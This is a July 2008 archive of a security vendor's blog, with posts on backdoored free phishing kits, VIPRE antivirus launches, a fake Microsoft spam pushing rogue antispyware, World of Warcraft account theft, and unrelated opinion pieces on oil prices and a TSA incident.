Month: July 2008

Phish kits: No such thing as a free lunch

Not much news to those who track phish kits, but a bit of poetic justice here in this academic paper:

The most recent step in the commoditization of phishing was the distribution of free phishing kits. These kits are actively advertised and distributed at no charge. However, as the economist Milton Friedman would have pointed out [6], there is no free lunch in the underground economy. Often, free phishing kits hide backdoors through which the phished information is sent to recipients (probably the original kits’ authors) other than the intended ones. In other words, far from being a display of generosity on behalf of the authors, free phishing kits respond to rational economical motivations. That is, kits’ authors minimize the effort and risks associated with deploying the phishing site and attracting victims, and maximize their return on investment by harvesting the work of unwitting users.

Link: html, pdf (via John LaCour at Mark Monitor)

Alex Eckelberry

Vipre Enterprise webcast next Tuesday

I’ll be holding a webcast next Tuesday on the upcoming enterprise version of VIPRE. Feel free to drop by.

From our marketing team:

As part of its ongoing efforts to address the rapidly evolving malware landscape facing enterprises, Sunbelt Software introduces VIPRE Enterprise™ – a completely new solution that combines antivirus, antispyware, anti-rootkit and other technologies into a seamless, tightly-integrated product.

Join Sunbelt Software on Tuesday, July 29, 2008 at 2:00pm EDT for a first look at VIPRE Enterprise and learn how Sunbelt started with a blank slate to design a new, next-generation antivirus and antispyware technology to deal with today’s malware in the most comprehensive, highly efficient manner. The result is a clean, fast, and powerful anti-malware solution developed ‘by admins for admins’.

VIPRE Enterprise is designed to optimize overall performance by melding antivirus and antispyware together into one, single, powerful engine. This combination of technologies gives you high-performance software that doesn’t slow down users’ PCs, is low on system resources, and makes it easy for you to protect your network.

When: Tuesday, July 29, 2008 2:00 PM (EDT)

Please register here: http://www.sunbeltsoftware.com/rd/?id=080722WC-VE_webcast_July29

(VIPRE Enterprise is also scheduled to ship next Tuesday.)

Alex Eckelberry

VIPRE Antivirus + Antispyware is now released

Today, I’m pleased to announce that after a very long development and beta testing effort, we have released VIPRE Antivirus + Antispyware. This is the consumer version; the enterprise version will be shipping next week. Company propaganda here, earlier beta announcement (with more information) here. Some reviewers also took an early peek at the beta — including Robert Vamosi at CNET and John Hawes at Virus Bulletin.

Those who have been following this blog may have read some of my prior postings, which started out with a blog post early last year entitled Evolving the Antimwalware Technology Model. In that blog post, I discussed how antivirus products have had to adapt to a rapidly changing environment.

The flood of malware these days is just mind-boggling, and the tools needed will require constant reevaluation and new thinking. However, it starts with the platform: Our first task was to make everything from scratch, a blank slate, in order to start off without any legacy code and bloat, using the latest concepts in software development. The second was to create a product that successfully combined antivirus and antispyware functionality, since those two concepts are no longer separate (all users cares about is malware, not some semantic argument about the definition of a trojan, or whether a commercial keylogger should be tagged in a system scan, or whether adware is acceptable or not).

But it goes further than just bloat and performance: It’s a problem with our industry. People generally just hate antivirus vendors (I don’t use the term “hate” lightly, as I’ve seen the user surveys). People are angry with resource hogging applications. They’re upset about missed malware, and poor support coming from some distant overseas call center. They’re tired of “scan and scare” tactics. And they’re very upset about price gouging and abuse of the software subscription process (such as the now common and shameful practice of negative option billing — automatically charging your credit card without your explicit permission.)

And the users are right. Something has to change.

VIPRE is not just a product that answers the call for better performance. It’s also about other ideas, such as fair pricing, responsive support, ethical (not “scan and scare”) marketing, responsible subscription practices, and so on.

Ok, off my soapbox. Please feel free to download the trial version and give it a whirl, and don’t hesitate to email me directly with your thoughts.

(The new CounterSpy 3.0 will also be released soon, likely before the end of the month.)

Alex Eckelberry

Email protection for OpenID

A new service by a company called LiquidID is mildly interesting. 

One of the potential hazards of OpenID is that your email address might get compromised and then life won’t be fun anymore.

However, if you login with a LiquidID account, each OpenID site has its own alias through LiquidID.  If your email gets compromised or gets really spammy, simpy remove that alias. 

You can see more here (via ReadRightWeb).

Alex Eckelberry

Another fake MS spam

Fakems1238888

The file being pushed, free.exe, is an installerfor Antivirus XP 2008, a nasty rogue antispyware program.

Avxp2008234234

As we all know, for quite some time now, spam has stopped just being a nuisance, and became a serious potential security threat.  It used to be that one wouldn’t get too upset if the occasional Viagra email got through a spam filter.  That’s no longer the case: Spam is a significant vector for malware infection through malicious links and social engineering, and if something gets through a spam filter — and then makes it past endpoint protection — one can have all kinds of nasty headaches.  

Alex Eckelberry
(thanks Adam)

 

The truth about oil

If you watched the markets today, it’s a big ol’ QED with regard to arguments that oil prices are being driven by speculative activity and hedge funds.

Last week, we could have immediately slashed the price of oil by releasing the Strategic Oil Reserves, hence killing the speculators. In the meantime, there is this argument that allowing offshore drilling will do anything to help prices, a ridiculous idea (all that will happen is oil companies will have leases they can use at their will, changing supply at their whim). Meanwhile, it’s a surprise to some that the biggest single exporter of oil to the US is Canada — almost double that of Saudi Arabia. The American public is the victim of a superb con job.

Whatever, I’ll go back to security now.

Alex Eckelberry

Truste is now for-profit

They went out and raised $10 mill and are now for-profit.

The group is converting to for-profit status and selling the bulk of its newly created stock to Accel Partners, the venture capital firm that backed eBay and Facebook.

Fran Maier, chief executive, Truste. (Credit: Jim Wilson/The New York Times)The group hopes to use the money to expand by coming up with more automated ways to help smaller Web publishers develop privacy policies.

Terrible idea? Of course. Truste’s reputation in the security industry is certainly quite poor, and this will not help. (For some light reading, you can read some of Ben Edelman’s past posts on the subject of Truste here and here.)

I like the folks over at Truste, and I would only tender one piece of advice to them now that they’re going to be looking for cash: The security game is not an intellectual one, with fair games and trust. There are too many sleazy bastards out there. Start being the tough, uncompromising, hard-assed organization that we expect you to be, and you’ll earn our respect, as well as the respect and trust of the consumer.

Alex Eckelberry

Are Chinese hackers more coordinated than conventional wisdom?

Chinesepeac2134882348Jumper over at the Dark Visitor (a blog which focuses almost excluslively on Chinese hackers) takes issue with Bruce Schneier’s article, The Truth about Chinese Hackers.

In response to Bruce’s claim that “the hackers are in this for two reasons: fame and glory, and an attempt to make a living”, Jumper responds by saying:

“This is very short sighted. We should be honest here, neither Bruce Schneier nor Heike and I know with absolute certainty what Chinese hackers are doing, who is coordinating them and who might be paying them. Maybe the article shouldn’t be titled “The Truth About Chinese Hacker” because Bruce doesn’t know what the truth is (Heike would have said that he couldn’t handle the truth either, but that’s not my style).

I think a lot of people assume that activity attributed to the PRC is simply based on the IP address. After studying spear phishing attacks, custom malware attacks and the types of data that have been exfiltrated from various NGO targets it seems likely that some entity is coordinating the collection and exploitation of this information. In my humble opinion, there may be more to this than WoW passwords.”

Link here.

Alex Eckelberry

Family Plug Time

My super-smart cousin, Susan Amussen, has written her third historical book, Caribbean Exchanges.

English colonial expansion in the Caribbean was more than a matter of migration and trade. It was also a source of social and cultural change within England. Finding evidence of cultural exchange between England and the Caribbean as early as the seventeenth century, Susan Dwyer Amussen uncovers the learned practice of slaveholding.

As English colonists in the Caribbean quickly became large-scale slaveholders, they established new organizations of labor, new uses of authority, new laws, and new modes of violence, punishment, and repression in order to manage slaves. Concentrating on Barbados and Jamaica, England’s two most important colonies, Amussen looks at cultural exports that affected the development of race, gender, labor, and class as categories of legal and social identity in England. Concepts of law and punishment in the Caribbean provided a model for expanded definitions of crime in England; the organization of sugar factories served as a model for early industrialization; and the construction of the “white woman” in the Caribbean contributed to changing notions of “ladyhood” in England. As Amussen demonstrates, the cultural changes necessary for settling the Caribbean became an important, though uncounted, colonial export.

If you’re as interested in history as I am, feel free to take a gander over to the book’s page here.

Alex Eckelberry

Online Games getting the same security as banks

Being myself a World of Warcraft player since they published the beta a few years ago (at least during the weekend when my wife allows me to play a bit) I’ve noticed recently that you can buy a 2 way authentication token for the game.

No, that’s not a joke:
http://www.blizzard.com/store/details.xml?id=1100000182

I saw daily people complaining that their account got hacked and all gold and items were stolen. Stolen items and gold? That may sound childish, but in real world it’s worth real money. There are always buyers who pay real money to get the in-game currency “gold” delivered. Players need gold to buy equipment for their character. 1000 World of Warcraft Gold sells for about $39 US. There is always a market for the gold, since some people do not have the time to spend hours for collecting gold during gameplay.

The password stealers for such online games significantly outnumber the game serial stealers from other games. The reason for this is that there are so called Goldseller Companies which not only sell gold, but also buy gold for real money from other players so that they can resell it later, in a professional way, for profit. This motivates hobby hackers to create their own keylogging software to gain some extra money. Once a person has access to the playing character, the Gold can be sent via the in-game e-mail to themselves. In most cases, the hackers create a temporary account. Later, they simply delete the account once successful transactions have been made.

Seeing that you can buy this token optional will solve some of the security issues but not all. Because when it is optional not everyone will buy it. And people that spend anyway attention to their computer security (by considering / purchasing this item) are most likely informed about antivirus solutions and that they have to keep them up-2-date.

The high risk users still remain as long as this gadget is not bundled in every new game that is sold. However, it is highly honorable for blizzard to improve their security system, even if it’s just for a game. The next step should be that they include a time out blocker for their online account managing system. Because in this way you could brute-force the login data for the first authentication process….

Signing off, Michael St. Neitzel

Is this abuse?

This is quite disturbing — a passenger apparently gets upset about having to give up her contact lens cleaner to the TSA (which, as I’ve written on before, is itself an idiotic rule).  This results in her being tackled to the ground.

 

I can only see what’s on the video, but in my mind, there is absolutely no excuse for treating anyone like this, when it’s clear in the video that she wasn’t doing anything obviously threatening.  Police are (or should be) trained in managing difficult situations without resorting to this type of violence. 

Alex Eckelberry